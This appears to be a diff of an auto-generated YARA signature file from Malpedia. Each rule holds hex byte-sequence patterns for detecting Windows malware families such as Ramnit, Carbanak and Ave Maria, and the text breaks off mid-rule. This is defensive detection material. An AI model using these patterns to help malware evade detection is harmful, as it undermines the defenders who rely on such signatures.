"yara-signator v0.6.0" @@ -134096,49 +136935,32 @@ rule MALPEDIA_Win_Karius_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4c8b8424a0000000 bf01000000 8bd7 498bce ffd3 4183bf8c00000000 } - $sequence_1 = { 4d03d6 448bcd 85db 0f8477000000 8bb424b0000000 } - $sequence_2 = { 0f84b3000000 458b9f88000000 4d03de 418b5b18 85db } - $sequence_3 = { ffd3 4183bf8c00000000 0f84b3000000 458b9f88000000 } - $sequence_4 = { 488b05???????? 4885c0 7512 ff15???????? 488905???????? } - $sequence_5 = { 8bb424b0000000 418b10 8bcd 4903d6 0fb602 } - $sequence_6 = { c3 85c0 7505 e8???????? b801000000 } - $sequence_7 = { 85db 0f849d000000 41837b1400 0f8492000000 } - $sequence_8 = { 0f8492000000 458b4320 458b5324 33ed 4d03c6 4d03d6 } - $sequence_9 = { 8d7b01 448bfb 448be3 4885c9 } - $sequence_10 = { 56 be???????? 33d2 8a040a 3a06 7522 } - $sequence_11 = { 83e830 89450c db450c 8a07 d9ca d8c9 } - $sequence_12 = { b801000000 8702 83f801 74f4 } - $sequence_13 = { 752c 8a4701 3c30 7c25 3c39 } - $sequence_14 = { 488d4b10 488d542450 41b804000000 c6430f68 } - $sequence_15 = { 4d8bcf 33d2 41b800001000 488bce } - $sequence_16 = { 803e5d 7508 5f 5b 8d4601 5e } - $sequence_17 = { 7505 8d7b02 eb09 6685c0 } - $sequence_18 = { 8d7308 56 ffd7 50 56 e8???????? } - $sequence_19 = { ff15???????? 4c8be8 498bce ff15???????? 4d85ed } - $sequence_20 = { 8b4dfc 83c404 8945f4 83c706 050024ffff } - $sequence_21 = { 4d8bc7 488bd0 488bce ff15???????? } - $sequence_22 = { e9???????? 8b45f8 5f 5b 5e } - $sequence_23 = { 8b4508 85c0 7417 8b4008 85c0 7412 8b4d0c } - $sequence_24 = { 7405 f60001 7502 33c0 } - $sequence_25 = { 448bc0 33d2 488bce ff15???????? 4c8bf0 4885c0 } - $sequence_26 = { 48895c2420 4d8bcc 4d8bc7 488bd0 } + $sequence_0 = { 397d68 7409 ff7568 e8???????? 59 6a57 5e } + $sequence_1 = { 50 895de4 e8???????? 837d2808 8b4514 } + $sequence_2 = { 0f8390feffff 8b0488 0fb6c8 894538 c16d3808 894d3c } + $sequence_3 = { 6a00 50 e8???????? 83c40c 33c0 89442410 e9???????? } + $sequence_4 = { 6a0a 8d45e8 8975e4 e8???????? 8d5dd0 e8???????? } + $sequence_5 = { 50 e8???????? 8d4570 50 ff750c 8d85d0030000 56 } + $sequence_6 = { 69c0a0860100 8a563c c7460c01000000 885608 89442410 3bd8 0f8387050000 } + $sequence_7 = { 8b0488 0fb6c8 894538 c16d3808 894d3c 899d40040000 8b15???????? } + $sequence_8 = { 8d858c000000 50 8d8574ffffff 6a4c 50 e8???????? 59 } + $sequence_9 = { 0f94c1 888c286c0d0000 03c7 89442410 837c241010 0f8c7affffff } condition: - 7 of them and filesize <434176 + 7 of them and filesize <540672 } -rule MALPEDIA_Win_Ramnit_Auto : FILE +rule MALPEDIA_Win_Alma_Locker_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "9f7bb136-c877-5703-86ba-5c3c0993dd1e" + id = "a8975e90-f59f-53dc-8c8c-bbe753edcfd3" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramnit" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ramnit_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_locker" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.alma_locker_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "a743fa525eb529644f7aae0eeccbdf2bcc4af05febdbf59986022c9547272ab4" + logic_hash = "df780972bf15a2baf7532cad09aa2dd13a5bee9ccc29d4fb62357c0162af8a26" score = 75 quality = 75 tags = "FILE" @@ -134152,32 +136974,32 @@ rule MALPEDIA_Win_Ramnit_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 3a06 7512 47 46 e2f6 b801000000 59 } - $sequence_1 = { 750b 4f 3b7d08 73e7 bf00000000 } - $sequence_2 = { 57 56 fc 807d1401 } - $sequence_3 = { 5f 59 5a 5b c9 c20800 55 } - $sequence_4 = { ff750c ff75fc e8???????? 0bc0 7429 } - $sequence_5 = { 8bc7 5a 5b 59 5f } - $sequence_6 = { 8bc1 f7d0 48 59 5f 5e } - $sequence_7 = { f3a4 fc 5e 5f 59 5a } - $sequence_8 = { 8bd7 2b5508 59 5f 5e } - $sequence_9 = { 8b5d0c 4b f7d3 23c3 } + $sequence_0 = { 8d8d6cfeffff e8???????? 83c404 8d4d8c c645fc07 51 8bd0 } + $sequence_1 = { 720e ffb5ccfeffff e8???????? 83c404 837da008 720b ff758c } + $sequence_2 = { 0304b5e86a0210 59 eb02 8bc3 8a4024 247f 3c01 } + $sequence_3 = { 50 ff15???????? 8bf0 89b52cfaffff } + $sequence_4 = { 83e11f c1f805 c1e106 8b0485e86a0210 f644080401 7405 } + $sequence_5 = { 8d8dd0fbffff e8???????? c645fc03 8d85d0fbffff 83bde4fbffff10 0f4385d0fbffff } + $sequence_6 = { b9???????? e8???????? 33c0 c645fc1f 33c9 66a3???????? 66390d???????? } + $sequence_7 = { 81fbfeffff7f 0f87ab000000 8b4614 3bc3 7325 ff7610 53 } + $sequence_8 = { b9???????? c705????????07000000 0f44f8 c705????????00000000 57 68???????? } + $sequence_9 = { 83c404 c78584fbffff0f000000 c78580fbffff00000000 c68570fbffff00 83bd9cfbffff10 720e } condition: - 7 of them and filesize <470016 + 7 of them and filesize <335872 } -rule MALPEDIA_Win_Brbbot_Auto : FILE +rule MALPEDIA_Win_Nabucur_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e240fcbc-2659-5f11-92b2-f24493c78ffd" + id = "01e16fcc-e93c-502a-bf23-e97657c28f28" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.brbbot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.brbbot_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nabucur" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nabucur_auto.yar#L1-L161" license_url = "N/A" - logic_hash = "d23aa206f76a72b99ca843cfc9c1f11b947cf7f249b06e1b49eb77df3aca0670" + logic_hash = "6100efc8bca15f40de853b2fa2bd4731e512123d488b941f31d2f09287a69887" score = 75 quality = 75 tags = "FILE" @@ -134191,32 +137013,38 @@ rule MALPEDIA_Win_Brbbot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7509 488d0daad10000 eb02 33c9 e8???????? 4883c438 } - $sequence_1 = { f2ae 48f7d1 48ffc9 4c8bc1 498d8e10040000 488bd5 e8???????? } - $sequence_2 = { 48f7d1 4c8d41ff 488d8b04010000 e8???????? } - $sequence_3 = { 885c2470 448bee 448bfe e8???????? 488b05???????? 4889442458 } - $sequence_4 = { 48895808 488970e8 33ff 488978b8 4c8960e0 } - $sequence_5 = { 48f7d1 48ffc9 4881f904010000 0f8724010000 4883c9ff } - $sequence_6 = { 81fa01010000 7d13 4863ca 8a44191c 42888401c0230100 } - $sequence_7 = { 488bfa ff15???????? 4c8d4704 488bc8 ba08000000 ff15???????? } - $sequence_8 = { 4c8b7540 8bd8 85c0 0f88d6020000 4c8d4da8 } - $sequence_9 = { 33d2 488bce e8???????? ff15???????? 4c8bc6 488bc8 33d2 } + $sequence_0 = { 48 49 85c0 75fa } + $sequence_1 = { 48 5f 894500 5d } + $sequence_2 = { 48 83e908 85c0 75f0 57 } + $sequence_3 = { 48 83e904 85c0 7ff3 8bf0 8b442448 } + $sequence_4 = { 48 83f801 89442418 0f8f15ffffff } + $sequence_5 = { 33ff 33f6 4a c744244001000000 } + $sequence_6 = { 009eaa030000 0fb686aa030000 57 83f80a 0f876d010000 } + $sequence_7 = { 48 8906 8d442410 50 } + $sequence_8 = { ba86a33ffb 83e904 ba575a2bfd eb69 83f901 7519 } + $sequence_9 = { 3f 71e3 0c42 869576f1896a 86f6 } + $sequence_10 = { 732e 5c 54 7346 b654 8c534c } + $sequence_11 = { 141b 46 ec 54 732e } + $sequence_12 = { 01e4 01f4 1481 0491 00850cf41196 } + $sequence_13 = { ff75f8 ff35???????? ff15???????? 8b7520 8b45e4 } + $sequence_14 = { 8b4608 50 ff15???????? 61 eb11 } + $sequence_15 = { 06 e409 9a1496099a1581 0d911c9060 9d 01e4 } condition: - 7 of them and filesize <198656 + 7 of them and filesize <1949696 } -rule MALPEDIA_Win_Alice_Atm_Auto : FILE +rule MALPEDIA_Win_Newbounce_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "66f601ee-4bc7-50a3-954d-4444abf4a52f" + id = "70b5f47a-ee55-5897-8fcd-06a813c41881" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alice_atm" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.alice_atm_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.newbounce" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.newbounce_auto.yar#L1-L151" license_url = "N/A" - logic_hash = "5f587bc558ca0a42c8c96fe5a1cfb47b3decdd71da86c983392de940e1606224" + logic_hash = "53d4154f041c8f5d8c7be0de086b650af8bff8de758570421d79234a0be341f3" score = 75 quality = 75 tags = "FILE" @@ -134230,32 +137058,37 @@ rule MALPEDIA_Win_Alice_Atm_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff75f8 8f45fc ff7508 e8???????? 8b45fc } - $sequence_1 = { 0fb7c0 8945f8 8b7d10 83ff00 0f86c2000000 } - $sequence_2 = { c9 c20c00 55 8bec 81c4a4feffff } - $sequence_3 = { 894609 837f0414 7305 8b5704 } - $sequence_4 = { 897dfc 8d9df6fdffff 53 ff7508 e8???????? 0bc0 } - $sequence_5 = { 57 e8???????? 0bc0 0f848b000000 53 6804010000 } - $sequence_6 = { 53 e8???????? 57 6806020000 56 } - $sequence_7 = { 50 68???????? 68???????? 8d45e8 50 68???????? 6a05 } - $sequence_8 = { 6a00 6a00 6809100000 ff7320 e8???????? 8945fc } - $sequence_9 = { 0f85ce000000 68ea030000 ff7508 e8???????? 8bf8 } + $sequence_0 = { 83e00f 7e05 2bf0 83c610 } + $sequence_1 = { ff15???????? 85c0 0f844b010000 ba28000000 } + $sequence_2 = { ff15???????? 85c0 0f8437020000 8b4c2428 } + $sequence_3 = { ff15???????? 85c0 0f8436020000 4889bc2428010000 c784242001000022000000 c784241801000073252000 c78424100100006b2d2000 } + $sequence_4 = { 75f5 49ffc8 75eb 488d8104020000 } + $sequence_5 = { e8???????? cc b201 488bcf e8???????? 4c8d1d8f920100 488d5547 } + $sequence_6 = { 75f2 ebe3 488d154ac20100 498bcc 4d8bc7 } + $sequence_7 = { 75f5 49ffc9 75e8 488d8e54030000 } + $sequence_8 = { 81e3c0000000 0bf3 c1ee06 0b14b5b0876300 } + $sequence_9 = { 81e300000600 c1ea14 8b1495b0896300 81e6000f0000 } + $sequence_10 = { 81e300e00100 0bf3 c1ee0d 0b0cb5b0886300 } + $sequence_11 = { 81e2ff000000 8b0c8d48436300 8b1c9d48476300 33cb 8b1c85484b6300 2bcb } + $sequence_12 = { 81e2ff000000 c1e808 c1e208 53 } + $sequence_13 = { 81e3001e0000 8bef 81e50000e001 0bf5 c1ee15 8b34b5b08d6300 } + $sequence_14 = { 81e3001e0000 8bd5 81e280010000 0bda 8b14b5b08d6300 } condition: - 7 of them and filesize <49152 + 7 of them and filesize <8637440 } -rule MALPEDIA_Win_Feodo_Auto : FILE +rule MALPEDIA_Win_Innaput_Rat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "63743f44-4e6b-5a91-9837-bc3f6dee3649" + id = "bdbf07bd-d4a4-5362-b354-c606ef8af022" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.feodo" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.feodo_auto.yar#L1-L175" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.innaput_rat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.innaput_rat_auto.yar#L1-L115" license_url = "N/A" - logic_hash = "b3401747482af4dd4837f27d2a5311953b45c82ad5e6a5cd690191bf7d127342" + logic_hash = "f6067a2a0e56ef408d96b72de49c1461531d24eb998121258442401a90d43684" score = 75 quality = 75 tags = "FILE" @@ -134269,38 +137102,32 @@ rule MALPEDIA_Win_Feodo_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83c120 8d51d0 83fa09 7704 8bca eb10 8d519f } - $sequence_1 = { 6a00 8d542424 52 6a00 ff15???????? 85c0 } - $sequence_2 = { 7422 83e801 7404 83c8ff c3 8b4c2404 b802000000 } - $sequence_3 = { 6a00 8d4c240c 51 52 50 8b442414 50 } - $sequence_4 = { 56 57 33ff 57 6a02 6a02 57 } - $sequence_5 = { 742f 8b0f 6a01 68???????? 68???????? } - $sequence_6 = { 50 8b442414 50 ff15???????? 85c0 7405 } - $sequence_7 = { 6a00 8d942418020000 52 50 } - $sequence_8 = { 3452 e8???????? 0202 0202 1c83 0000 } - $sequence_9 = { 229921688d3c 2ee83e207468 60 238b0d03c783 782e 1463 } - $sequence_10 = { 006c082e 08cc 6969690bc8cc69 690c2e2e0b8ce0 04f7 e10c 206d53 } - $sequence_11 = { 150d14f452 696969697f3cc3 af e2c3 } - $sequence_12 = { 041e 6e 18b8161e6e18 b8161e33c9 0000 16 43 } - $sequence_13 = { 0404 0404 0316 16 } - $sequence_14 = { 0056b0 2e2801 0bd0 83c4ce 00576a 05c705c07f } - $sequence_15 = { 007538 034568 3327 325616 } + $sequence_0 = { e8???????? 59 85c0 7427 ffb720060000 } + $sequence_1 = { ffd7 8b4510 898618060000 8b4514 8b00 } + $sequence_2 = { 8b06 894710 ff7604 035e08 ff5708 56 ff5708 } + $sequence_3 = { 8d7710 eb02 8b36 391e 75fa 6a0c } + $sequence_4 = { 8945fc ff15???????? 33db 395f10 } + $sequence_5 = { ff15???????? ffb718060000 ff15???????? 85c0 } + $sequence_6 = { 8b460c 83f8ff 7404 3bc3 751b } + $sequence_7 = { eb02 8b36 391e 75fa 6a0c ff5704 59 } + $sequence_8 = { 83f8ff 7404 3bc3 751b } + $sequence_9 = { b001 ebd3 55 8bec } condition: - 7 of them and filesize <270336 + 7 of them and filesize <73728 } -rule MALPEDIA_Win_Fusiondrive_Auto : FILE +rule MALPEDIA_Win_Carbanak_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d735e520-5418-5676-9517-95f81cfe7607" + id = "c07fe935-504c-5c98-a746-fcd9d2cd2656" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fusiondrive" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fusiondrive_auto.yar#L1-L119" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.carbanak_auto.yar#L1-L108" license_url = "N/A" - logic_hash = "b988107dd8630d41b8dbc9f6aa013be888aa54392baf79daf500a205d72bf5ae" + logic_hash = "71119e0e8f2ea511e845d7f70364c6b521841c48aa27c3226400782c05c0bf22" score = 75 quality = 75 tags = "FILE" @@ -134314,32 +137141,32 @@ rule MALPEDIA_Win_Fusiondrive_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 48898620020000 0fb7c0 66f3ab 488d3d501c0100 482bfe 8a041f } - $sequence_1 = { 0f846f010000 660f6f05???????? f30f7f442470 66c745806557 c6458200 488d542470 488bc8 } - $sequence_2 = { 7735 488bd1 4983ff08 7203 } - $sequence_3 = { 4c8d4c2440 4983fd08 4d0f43cf 488d7c2420 4983fc08 490f43fa 4c8b5c2450 } - $sequence_4 = { 4863c9 4c8d0514070100 488bc1 83e13f 48c1f806 488d14c9 498b04c0 } - $sequence_5 = { 0fb60a 83e10f 4c8d05f899ffff 4a0fbe8401a8150100 } - $sequence_6 = { 488b542450 488bc8 488902 488b5310 ff15???????? 33c0 } - $sequence_7 = { ff15???????? 8d0c4501000000 4103cf 458d7c2402 418bd7 } - $sequence_8 = { ff15???????? 3db7000000 0f8432060000 33ff 8bcf } - $sequence_9 = { 7528 48897df7 48c745ff07000000 66897de7 } + $sequence_0 = { 7f05 83c061 eb03 83c027 } + $sequence_1 = { 7907 32c0 e9???????? 7507 b001 } + $sequence_2 = { 32c0 e9???????? 7507 b001 } + $sequence_3 = { 2bd1 81e921100000 8bc1 c1f80e 0cc0 } + $sequence_4 = { 8b4608 eb02 8bc3 85c0 } + $sequence_5 = { c3 8d4120 3c1f 7705 0fb6c1 } + $sequence_6 = { 7c0d e8???????? 84c0 7504 } + $sequence_7 = { 7c0d e8???????? 84c0 7504 33c0 } + $sequence_8 = { e9???????? 3d2c5c0700 750a e8???????? } + $sequence_9 = { 3d2c5c0700 750a e8???????? e9???????? } condition: - 7 of them and filesize <290816 + 7 of them and filesize <658432 } -rule MALPEDIA_Win_Lemonduck_Auto : FILE +rule MALPEDIA_Win_Rarog_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "731c6313-f288-5766-8bd2-365369510b0a" + id = "af269765-c756-5cee-8964-0f35e326beb2" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lemonduck" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lemonduck_auto.yar#L1-L114" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rarog" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rarog_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "45ef0f5ff171ed9ba03997994f483fd024a13ee436b3a8cb1b81df72104021e2" + logic_hash = "90be509347cdd78e80ac954224309fb579e700a948cbf60773c02796ec820629" score = 75 quality = 75 tags = "FILE" @@ -134353,30 +137180,32 @@ rule MALPEDIA_Win_Lemonduck_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 41c1e018 42330c22 450bc8 46334c2204 4433d9 410fb64625 4533d1 } - $sequence_1 = { 488b7c2430 33c0 488983a0000000 488983a8000000 488983b0000000 488983b8000000 488983c0000000 } - $sequence_2 = { 418bc0 80f909 410f47c2 02c1 41884102 410fb64d01 80e10f } - $sequence_3 = { 488b89d8000000 48896c2438 4889742440 4883f9ff 7414 ff15???????? 8b4758 } - $sequence_4 = { 488d15d2280a00 488bcb ff15???????? 488905???????? 4885c0 0f8474010000 488d159a280a00 } - $sequence_5 = { 488d05c6ba0000 488905???????? 488d0558c70000 488905???????? 488d05bad20000 488905???????? 488d054ce30000 } - $sequence_6 = { 41c1e908 410fb6c7 41c1ef08 418bb48a50951600 400fb6cf 458ba48250951600 410fb6c6 } - $sequence_7 = { 482bc1 4883c0f8 4883f81f 0f8798000000 ba4f000100 e8???????? 90 } + $sequence_0 = { 8db5c8fdffff e9???????? 8b542408 8d420c 8b8ab8fdffff } + $sequence_1 = { 83781410 7202 8b00 8b35???????? 53 53 50 } + $sequence_2 = { 8d8d28fdffff e8???????? 53 53 68???????? 8d85e8feffff 50 } + $sequence_3 = { 50 68???????? 51 e8???????? 83c40c 83ec1c c645fc21 } + $sequence_4 = { 8b75ac 46 56 53 ff15???????? 89459c } + $sequence_5 = { 68???????? 50 8d4dd0 e8???????? 59 59 8d8d9cfeffff } + $sequence_6 = { ff7508 6a00 6a01 ff15???????? 8bf0 85f6 7409 } + $sequence_7 = { 57 83c8ff e8???????? 53 68???????? 83c8ff } + $sequence_8 = { 59 8b7508 8d34f5501d4300 391e 7404 8bc7 eb6d } + $sequence_9 = { c1e002 c1eb06 0bc3 8a80c0b64200 884102 0fbe443202 83e03f } condition: - 7 of them and filesize <10011648 + 7 of them and filesize <598016 } -rule MALPEDIA_Win_Andromut_Auto : FILE +rule MALPEDIA_Win_Mrdec_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "dba8d7dc-66b9-5da2-b280-7c7cd5055ee5" + id = "5cd525b0-3fcd-5de1-aa88-bd5dca592c29" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromut" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.andromut_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mrdec" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mrdec_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "97f484310b347cbce8f6e0e26b13796260e2f5f5c7183f29f706e1875ad44a4f" + logic_hash = "c22120d79fe39ae9d27a4d21c75a9bbd9a26aee0b664e8fa2f821d0411c6aa0d" score = 75 quality = 75 tags = "FILE" @@ -134390,32 +137219,32 @@ rule MALPEDIA_Win_Andromut_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b75f8 6bc828 8b441914 03441910 b9aacd12d8 50 56 } - $sequence_1 = { e8???????? 8d850cffffff 50 8d8574ffffff 50 8d95fcfcffff 8d8d74fcffff } - $sequence_2 = { c785fcfeffff84408441 c78500ffffff842c8415 c78504ffffff843c840d c78508ffffff841c8423 } - $sequence_3 = { e8???????? 8d8de8fcffff 51 8d8dd8faffff 51 ffd0 } - $sequence_4 = { 83c40c c745d4e278e238 c745d8de58e218 c745dcdef8dcb8 c745e0e498e0f8 } - $sequence_5 = { e9???????? 83bde4feffff06 0f85cf000000 8b85e8feffff 83f803 7524 83ef02 } - $sequence_6 = { 8bd0 51 ffb5fcfcffff 8d4dcc e8???????? 59 } - $sequence_7 = { f3ab 8b7dfc b802210000 6689443e16 0fb7443e06 } - $sequence_8 = { 53 6a0a 6a18 8d8510f4ffff c645fc02 50 e8???????? } - $sequence_9 = { 5a 84c0 745c 8d4601 894588 f7e2 0f90c1 } + $sequence_0 = { c64446fa00 57 56 e8???????? 68???????? 56 e8???????? } + $sequence_1 = { 6a00 8d45cc 50 68ef000000 68???????? } + $sequence_2 = { 50 ff75f0 6a00 6a00 6a00 ff75e8 e8???????? } + $sequence_3 = { 7532 68dc050000 ff75dc 68???????? e8???????? } + $sequence_4 = { 6a00 6814010000 68???????? ff75d8 e8???????? 8d3550514000 } + $sequence_5 = { 8bec ff7508 6a40 e8???????? 0bc0 750c 68c8000000 } + $sequence_6 = { 81c700020000 68???????? 57 e8???????? 68???????? 57 e8???????? } + $sequence_7 = { 59 51 80c141 884808 ff05???????? 6a00 6a00 } + $sequence_8 = { 6a02 e8???????? 0bc0 0f8530010000 c745f000400000 ff75f0 } + $sequence_9 = { 6a00 6a00 e8???????? ff75dc e8???????? } condition: - 7 of them and filesize <368640 + 7 of them and filesize <44864 } -rule MALPEDIA_Win_Ave_Maria_Auto : FILE +rule MALPEDIA_Win_Hyperbro_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "410b5f16-91ac-5311-b6ab-598dd1954c39" + id = "3941e796-a485-533f-bda6-3b99f666d1b3" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ave_maria_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperbro" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hyperbro_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "d6a2fe1f05fe69e9ea5ce04e4093200d3e962df5b8f3c4c00fc93efedbc85567" + logic_hash = "4bee21ef51c3ea4f0bd6259a2f8a9c95c3e4ba56a999c789fc7f134934b59561" score = 75 quality = 75 tags = "FILE" @@ -134429,32 +137258,32 @@ rule MALPEDIA_Win_Ave_Maria_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b07 ff740610 8d4614 50 8d45f8 50 } - $sequence_1 = { 52 8b08 6a01 50 ff510c 85c0 74c1 } - $sequence_2 = { 6a0a 03c1 59 8bf8 f3a5 8d4d30 } - $sequence_3 = { 0f57c0 c745e015000000 50 8d4de0 0f1145e8 e8???????? 8bc8 } - $sequence_4 = { 803800 7509 33c0 5b c3 33c0 40 } - $sequence_5 = { 8bc7 99 2bc1 8bcf 1bd6 52 50 } - $sequence_6 = { ff500c 8b06 68???????? ff37 8b08 } - $sequence_7 = { 51 54 8bce e8???????? 8b4d08 e8???????? 83c410 } - $sequence_8 = { 300431 41 3bcf 7ced 5f 8bc6 5e } - $sequence_9 = { 83ec18 53 8bd9 56 57 895df8 } + $sequence_0 = { 33c0 6a40 66890479 e8???????? 6a40 } + $sequence_1 = { 8b4604 83c004 50 6a00 57 } + $sequence_2 = { 46 47 83e801 75f5 } + $sequence_3 = { 8d542428 68???????? c74424200c000000 c744242801000000 89542424 ff15???????? } + $sequence_4 = { 05ff000000 41 3d01feffff 0f871c010000 8bd5 2bd1 83fa01 } + $sequence_5 = { 50 8d4c2472 51 6689442474 } + $sequence_6 = { 6882000000 c706???????? e8???????? 6882000000 6a00 50 } + $sequence_7 = { e8???????? 83c404 83eb01 79ec 8b4f2c 51 e8???????? } + $sequence_8 = { 83c410 85ed 750e 8b7c2410 } + $sequence_9 = { 8b44242c 3bc3 7415 50 e8???????? 83c404 } condition: - 7 of them and filesize <237568 + 7 of them and filesize <352256 } -rule MALPEDIA_Win_Fuxsocy_Auto : FILE +rule MALPEDIA_Win_Radrat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "acae4e77-3091-5877-bdf5-d5242a4de3aa" + id = "f52e2c5a-eef0-5772-ac88-55315ac8b12c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fuxsocy" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fuxsocy_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.radrat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.radrat_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "7715515075d3596588ef1486b8f0b7f8a98d13af15afc29c2d4231048e4e16d8" + logic_hash = "a27dfe470245e6a0fc8e1e694300b8057fe423adc6b34415045732f4d66a4882" score = 75 quality = 75 tags = "FILE" @@ -134468,32 +137297,32 @@ rule MALPEDIA_Win_Fuxsocy_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 72f0 8bcf e8???????? 5f 5e 5d ff74240c } - $sequence_1 = { 8b4e08 890491 ff06 eb02 891e 5b 5f } - $sequence_2 = { 6689442420 8d442422 53 50 894c2420 885c2413 895c2418 } - $sequence_3 = { 85c0 7426 68???????? 68???????? ff15???????? 50 ff15???????? } - $sequence_4 = { 6804010000 8d85ccfdffff 50 ff15???????? 68???????? 8d85ccfdffff 50 } - $sequence_5 = { e8???????? 59 59 eb4b 807e0200 7404 85db } - $sequence_6 = { c745f808020000 ff15???????? 85c0 753d 8d85e8fdffff 50 } - $sequence_7 = { 33f6 ff15???????? 8bc8 e8???????? 85c0 7426 68???????? } - $sequence_8 = { 68???????? 50 8d54241c 8d4c2424 e8???????? 83c40c 83c310 } - $sequence_9 = { 50 ff74241c 33c9 ff74242c 41 c744242c32000000 c744246804000000 } + $sequence_0 = { 8d8d1cffffff e8???????? c685f0feffff00 c645fc00 8d4dcc e8???????? c745fcffffffff } + $sequence_1 = { c6855497ffff01 c645fc01 8d8d58ffffff e8???????? c745fcffffffff 8d4d80 e8???????? } + $sequence_2 = { 8d8d74ffffff e8???????? 68a0000000 8d8d74ffffff e8???????? 6a30 8d8d74ffffff } + $sequence_3 = { ff15???????? 8b4df4 894168 8b45f4 837868ff 750d ff15???????? } + $sequence_4 = { 8d8dd8feffff e8???????? 8d8d0cffffff 51 8d55c4 52 8b45ec } + $sequence_5 = { e8???????? 8a854c98ffff e9???????? 8b8d24d6ffff 83c15c 51 8b9524d6ffff } + $sequence_6 = { 8d8d50ffffff 51 